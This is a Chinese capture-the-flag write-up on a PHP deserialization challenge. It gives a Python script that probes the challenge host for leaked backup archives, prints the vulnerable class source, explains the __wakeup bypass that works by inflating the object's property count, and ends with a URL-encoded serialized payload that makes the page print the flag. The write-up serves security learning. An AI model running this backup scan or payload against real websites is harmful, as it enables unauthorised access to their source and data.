提示
- 备份文件下载(需要写些脚本或者手动或者用工具扫)
- php代码审计
- php反序列化
- php魔法函数
提示说有一份网站备份文件
可以用工具扫,但是要扫那么会儿写一个简单python脚本跑要方便点
import requests as rt webname = {'web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'db', 'data', 'code', 'test', 'admin', 'user', 'sql'} weblist = {'.rar', '.zip', '.7z', '.tar.gz', '.bak', '.txt', '.old', '.temp', '_index.html', '.swp', '.sql', '.tgz', '.tar'} for i in webname: for k in weblist: url = f'http://d9b53d59-0a31-41a0-b879-7c8e70be3989.node4.buuoj.cn:81/{i}{k}' re = rt.get(url) if re.status_code == 200: print(i, k) print(re.status_code) break
看来是有一个www.zip文件
访问下载
获得flag.php(这个是假的)
index.php
unserialize看来这题和反序列化有关了
class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}function __wakeup(){
$this->username = 'guest';
}当开始反序列化之前将username赋值为guest(wakeup是魔法函数在执行unserialize之前会执行这个)
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}当执行unserialize以后会执行,password必须等于100,username必须等于admin才会输出flag(destruct也是魔法函数,对象被销毁的时候执行)
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
这里需要绕过wakeup函数并且给password和username赋值
wakeup当内容与个数不匹配时不会执行
例如
O:4:"TEST":3:{s:5:"test1";s:2:"11";s:11:" TEST test2";s:2:"22";s:8:" * test3";s:2:"33";}
改为
O:4:"TEST":4:{s:5:"test1";s:2:"11";s:11:" TEST test2";s:2:"22";s:8:" * test3";s:2:"33";}
O代表类,然后后面4代表类名长度,接着双引号内是类名
然后是类中变量的个数:{类型:长度:"值";类型:长度:"值"...以此类推}
构造payload
<?php
class Name{
private $username = 'admin';
private $password = '100';
}echo serialize(new Name());
?>获得
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}需要绕过wakeup所以改为
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
因为里面有些url会表示为方格子,所以需要进行url编码在上传
最后payload:O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
获得flag